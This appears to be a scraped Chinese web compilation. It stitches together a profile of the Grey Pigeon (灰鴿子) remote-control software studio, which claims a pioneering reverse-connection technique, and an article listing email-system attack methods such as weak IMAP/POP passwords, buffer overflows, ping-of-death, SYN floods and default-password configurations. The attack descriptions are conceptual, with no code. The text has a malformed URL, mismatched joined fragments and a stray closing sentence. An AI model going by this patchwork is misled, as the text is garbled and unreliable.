http;//www.huigezi.net
八、 灰鴿子工作室成員介紹
葛軍:2003年初，與好友黃土平創建了灰鴿子工作室。2001年挺進版率先在遠程式控制制軟體上開發和使用了反彈連接技術。
黃土平:2003年初，與好友葛軍創建了灰鴿子工作室。
灰鴿子是同類軟體的祖先
參考資料：`

10. 黑客是如何攻擊別人的電腦的

黑客常常利用電子郵件系統的漏洞，結合簡單的工具就能達到攻擊目的。 一同走進黑客的全程攻擊，了解電子郵件正在面臨的威脅和挑戰…… 毫無疑問，電子郵件是當今世界上使用最頻繁的商務通信工具，據可靠統計顯示，目前全球每天的電子郵件發送量已超過500億條，預計到2008年該數字將增長一倍。 電子郵件的持續升溫使之成為那些企圖進行破壞的人所日益關注的目標。如今，黑客和病毒撰寫者不斷開發新的和有創造性的方法，以期戰勝安全系統中的改進措施。 出自郵件系統的漏洞 典型的互聯網通信協議——TCP和UDP，其開放性常常引來黑客的攻擊。而IP地址的脆弱性，也給黑客的偽造提供了可能，從而泄露遠程伺服器的資源信息。 防火牆只控制基於網路的連接，通常不對通過標准電子郵件埠(25埠)的通信進行詳細審查。 一旦企業選擇了某一郵件伺服器，它基本上就會一直使用該品牌，因為主要的伺服器平台之間不具互操作性。以下分別概述了黑客圈中一些廣為人知的漏洞，並闡釋了黑客利用這些安全漏洞的方式。 一、IMAP 和 POP 漏洞 密碼脆弱是這些協議的常見弱點。各種IMAP和POP服務還容易受到如緩沖區溢出等類型的攻擊。 二、拒絕服務(DoS)攻擊 1.死亡之Ping——發送一個無效數據片段，該片段始於包結尾之前，但止於包結尾之後。 2.同步攻擊——極快地發送TCP SYN包(它會啟動連接)，使受攻擊的機器耗盡系統資源，進而中斷合法連接。 3.循環——發送一個帶有完全相同的源/目的地址/埠的偽造SYN包，使系統陷入一個試圖完成TCP連接的無限循環中。 三、系統配置漏洞 企業系統配置中的漏洞可以分為以下幾類: 1.默認配置——大多數系統在交付給客戶時都設置了易於使用的默認配置，被黑客盜用變得輕松。 2.空的/默認根密碼——許多機器都配置了空的或默認的根/管理員密碼，並且其數量多得驚人。 3.漏洞創建——幾乎所有程序都可以配置為在不安全模式下運行，這會在系統上留下不必要的漏洞。面說說吧,希望你能從中領略一些道理.